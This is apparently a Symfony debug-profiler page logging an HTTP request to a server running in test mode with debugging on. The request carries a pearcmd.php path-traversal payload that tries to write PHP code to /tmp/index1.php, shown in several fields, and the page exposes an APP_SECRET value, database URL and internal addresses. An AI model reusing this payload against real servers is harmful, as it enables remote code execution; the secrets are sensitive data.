n/a

Request

GET Parameters

Key Value
/<?echo(md5("hi"));?>_/tmp/index1_php
""
config-create_/
""
lang
"../../../../../../../../usr/local/lib/php/pearcmd"

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_stopwatch_token
"c9f9d2"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
host
"52.71.234.132:443"
upgrade-insecure-requests
"1"
user-agent
"Custom-AsyncHttpClient"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Thu, 14 Nov 2024 05:19:51 GMT"
location
"https://www.52.71.234.132/index.php/?%2F%3C%3Fecho%28md5%28%22hi%22%29%29%3B%3F%3E%20%2Ftmp%2Findex1.php=&config-create%20%2F=&lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd"
x-debug-token
"2e9301"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_SECRET
"0468dc9487509ad162025c82176e60a9"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"postgresql://app:!ChangeMe!@127.0.0.1:5432/db_name?serverVersion=16&charset=utf8"
EWZ_RECAPTCHA_SECRET
""
EWZ_RECAPTCHA_SITE_KEY
""
GOOGLE_RECAPTCHA_SECRET
""
GOOGLE_RECAPTCHA_SITE_KEY
""
JWT_PASSPHRASE
""
JWT_PUBLIC_KEY
"%kernel.project_dir%/config/jwt/public.pem"
JWT_SECRET_KEY
"%kernel.project_dir%/config/jwt/private.pem"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
APP_ENV
"test"
CONTENT_LENGTH
""
CONTENT_TYPE
""
DOCUMENT_ROOT
"/var/www/campussuite/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/usr/share/httpd"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"52.71.234.132:443"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Custom-AsyncHttpClient"
PATH
"/usr/local/nvm/versions/node/v4.2.6/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php"
REDIRECT_STATUS
"200"
REMOTE_ADDR
"47.236.167.8"
REMOTE_PORT
"50620"
REQUEST_METHOD
"GET"
REQUEST_SCHEME
"https"
REQUEST_TIME
1731561591
REQUEST_TIME_FLOAT
1731561591.2453
REQUEST_URI
"/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php"
SCRIPT_FILENAME
"/var/www/campussuite/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"10.1.51.189"
SERVER_NAME
"_"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.22.1"
SYMFONY_DOTENV_VARS
"DATABASE_URL,GOOGLE_RECAPTCHA_SITE_KEY,GOOGLE_RECAPTCHA_SECRET,EWZ_RECAPTCHA_SITE_KEY,EWZ_RECAPTCHA_SECRET,CORS_ALLOW_ORIGIN,APP_SECRET,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE"
USER
"apache"